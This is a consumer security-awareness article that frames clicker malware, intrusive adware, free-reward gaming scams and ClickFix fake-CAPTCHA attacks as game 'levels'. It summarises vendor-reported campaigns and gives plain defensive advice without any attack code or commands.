Gamified attacks: don’t let a hacker play you
Gamified attacks use game-like mechanics — rewards, tasks, and even the feeling of “just one last step” — to push you into clicking, granting permissions, entering a password, or running a malicious command. The article presents four typical scenarios: clicker malware, intrusive adware, fake CAPTCHA, and scams promising free in-game rewards. This is not some genius hacking — it is calculated manipulation designed to turn your device into a source of profit for the attacker.
At first glance, it may look like an innocent game, a useful app, or a quick “win” within reach. In reality, though, it is not entertainment — it is manipulation. Gamified attacks use game-like mechanics — rewards, step-by-step progress, time pressure, and the feeling of “just one more click” — to subtly push you into granting permissions, entering sensitive information, or running something you would otherwise refuse. And the reward? The attacker gets it, whether in the form of ad revenue, stolen accounts, or your data. Let’s take a look at what forms this kind of trap can take.
Lvl 1: Clicker malware
Lvl 2: Intrusive adware
Lvl 3: Free rewards
Lvl 4: Fake CAPTCHA
Lvl 1: Clicker malware
Clicker malware is a malicious app that pretends to be a game or a useful tool — such as a QR scanner, flashlight, “cleaner,” or camera — but in reality it opens ads in the background and automatically clicks on them. This allows the attacker to make money, because advertising systems are tricked into thinking the activity comes from a real person. You pay for it through faster battery drain, higher data usage, and a slower phone.
Why is it gamified? These apps often lure users in with a simple and attractive promise: “premium for free,” “light version,” or “performance boost.” Everything seems normal, and the problem often appears only after some time, so you do not immediately connect it to the installation.
“Useful” apps on Google Play
McAfee described a case in which a group of apps made it into Google Play while posing as ordinary tools, but in reality they acted as ad-clicking machines after installation. There were 16 apps in total, most commonly flashlights, QR scanners, camera apps, converters, or task managers. Together, they had around 20 million installs. Once discovered, they were removed from the store.
The biggest “star” of the whole set? DxClean presented itself as a regular phone cleaning tool meant to help improve performance and maintain the device. In reality, however, it was one of the most downloaded apps in the entire malicious bundle. What made it even more deceptive was how trustworthy it seemed to users — it still maintained a relatively high rating of 4.1 out of 5 stars.
Games that clicked on ads
Check Point had already described the “Judy” campaign, in which dozens of apps — mostly games — abused users’ phones to generate fake ad clicks. This was far from a marginal issue: estimates pointed to millions of downloads. In fact, the campaign became one of the largest ad fraud cases to hit Google Play at the time. On the surface, however, these apps looked like ordinary entertainment, with nothing to suggest that they were actually making money for attackers.
Who was behind them? The malicious apps were linked to the Korean company Kiniwini, which appeared on Google Play under the name ENISTUDIO corp. The company normally developed mobile apps for both Android and iOS, so its presence in the store did not necessarily seem suspicious at first glance.
What determines the outcome of this level? Staying in control.
Such apps can quietly drain your battery, increase data usage, and slow down your phone without you realizing what is causing the problem. Keep in mind that even apps from official stores are not automatically safe — it is always a good idea to check the developer, reviews, and requested permissions.
Lvl 2: Intrusive adware
This is an app that pretends to be a harmless helper — such as an emoji editor, cleaner, or battery optimization tool — but after installation it starts flooding you with aggressive ads. These ads often appear outside the app itself, for example on your home screen or after unlocking your phone. Some variants also keep running in the background, which means the ads keep coming back even after the device is restarted.
Why is it gamified? Because it lures you in with what seems like a useful upgrade: a faster phone, longer battery life, better emojis, or premium features for free. At first, it appears completely normal, so you often do not connect the problem to the app until the moment you have already started to trust it.
“GhostAd” on Google Play
Check Point described a network of apps on Google Play that appeared to be ordinary utilities or emoji tools, but in reality they launched an advertising module in the background that kept running even after the app was closed or the phone was restarted. The campaign included at least 15 related apps, gathered millions of downloads in total, and one of them even reached second place in the Top Free Tools ranking.
The biggest warning sign? Two major red flags kept appearing in user reviews: ads were showing up outside the app itself, and for some users the icon disappeared after installation, making the malicious app much harder to find and uninstall.
Hidden apps
In one campaign, malicious apps disguised themselves as cleaners or battery optimization tools. After installation, they were able to launch on their own, even without any user action, and repeatedly displayed ads. To make removal more difficult, they could also change their name and icon to resemble system apps, such as “Google Play” or “Settings.” According to McAfee, these apps had anywhere from hundreds of thousands to more than a million installs, and they were also spread through ad pages on Facebook.
What made them especially deceptive? Because they renamed themselves to “Settings” or “Google Play,” users often could not even tell which app they were actually supposed to delete from their phone.
What determines the outcome of this level? Awareness.
When an app starts flooding your phone with ads, pushing you toward more installs, or nudging you into suspicious “subscriptions,” it is not just annoying — it is a way to profit from you. If ads start appearing outside the app itself or the app becomes difficult to uninstall, it is time to raise a red flag and remove it from your phone.
Lvl 3: Free rewards
These scams promise free Robux, skins, or other rewards and lead you through several seemingly simple steps, such as choosing a platform, entering your username, or confirming the “last step.” In reality, though, there is no reward at all — the goal is to steal your login credentials, personal data, or trick you into installing an app or signing up for something.
Why is it gamified? Because the attack creates a false sense that the reward is almost within reach. You are led through a series of tasks — filling out a form, logging in, or completing a so-called “verification” — while pop-ups like “Last step!” and time pressure are meant to push you into stopping to think and simply finishing that final step.
Roblox phishing in chat
This is a typical scenario in which an attacker contacts a victim in a Roblox chat or on another platform, promises them “free Robux,” and sends a link to a page styled to look like Roblox. The page then asks for a username and password. The scam often seems convincing precisely because it imitates the look of a familiar platform and relies on the user reacting without thinking too much. Once the user enters their details, the attacker can take over the account and steal the victim’s Robux.
The trickiest part? The moment a page promising free Robux asks for your password, it is not a reward — it is a login trap. The goal is not to give anything away, but to gain access to your account.
Free Fire and “free diamonds”
Scammers lure Free Fire players with promises of free diamonds, the game’s premium currency used to buy various rewards and items. The link usually leads to a page that promises a quick gain after a few simple steps — entering a username, choosing a platform, logging in, or completing the “last step.” In reality, however, there is no reward at all — the goal is to gain access to the victim’s account, payment details, or device.
Where is the trap? Free diamonds in exchange for a login or card details are not a reward — they are a scam. Real bonuses come only through official events and approved channels.
What determines the outcome of this level? Keeping a cool head.
ThiThis kind of scam can cost you your account, in-game currency, and valuable items, so if a supposed reward pushes you through a “last step,” a login, or an installation, it is time to stop — real bonuses do not come through third-party websites.
Lvl 4: Fake CAPTCHA
ClickFix is a social engineering technique that does not rely on exploiting a technical vulnerability, but on manipulating you. The attacker tricks you into running a malicious command yourself — often under the pretense of a routine check such as “Verify you are human.” The page then shows a simple set of instructions: open Run, paste the command, and confirm. In reality, though, you are launching the infection yourself.
Why is it gamified? Because the attack uses clearly separated steps that feel like completing a task or mini-quest: “1/3… 2/3… 3/3.” It also creates the sense that only one final step remains, while visually imitating familiar elements such as CAPTCHAs, error messages, or security warnings.
Fake GitHub notifications
Proofpoint described a campaign in which attackers abused GitHub notifications to send emails posing as security alerts. A link in such a message led to a fake website imitating GitHub, where the victim was met with a fake CAPTCHA using the ClickFix technique. The user was instructed to open the Run window, paste a command, and confirm it — resulting in the download of a malicious file and the installation of Lumma Stealer malware.
The trickiest part? The page often copied the malicious command to the clipboard automatically, making the user feel as though they were simply completing a routine verification. In reality, however, they were triggering the malware download themselves — and the whole process was designed to look like a quick routine, not an infection.
Phishing „Booking.com“
Microsoft disclosed a phishing campaign that had been targeting organizations in the hospitality sector since December 2024 while impersonating Booking.com. Attackers sent emails using various pretexts, such as negative reviews, guest messages, or account verification, with links leading to a fake page designed to mimic Booking.com. There, users were shown a fake CAPTCHA using the ClickFix technique, which instructed them to open the Run window, paste a command, and confirm it.
Where was the catch? The fake page looked like a routine verification step and often copied the command to the clipboard automatically, so the user simply followed the instructions without much thought. In reality, though, they were launching the malicious code themselves.
What determines the outcome of this level? Vigilance.
This kind of attack can lead to the theft of your passwords, cookies, etc., making it easier for attackers to take over accounts or gain further access to environment. The moment a “CAPTCHA” asks you to copy and run commands, it is not verification — it is a trap, and the best thing you can do is close the page immediately.
This result was supported by the SOCCER project, funded under Grant Agreement No. 101128073, with the support of the European Cybersecurity Competence Center (ECCC).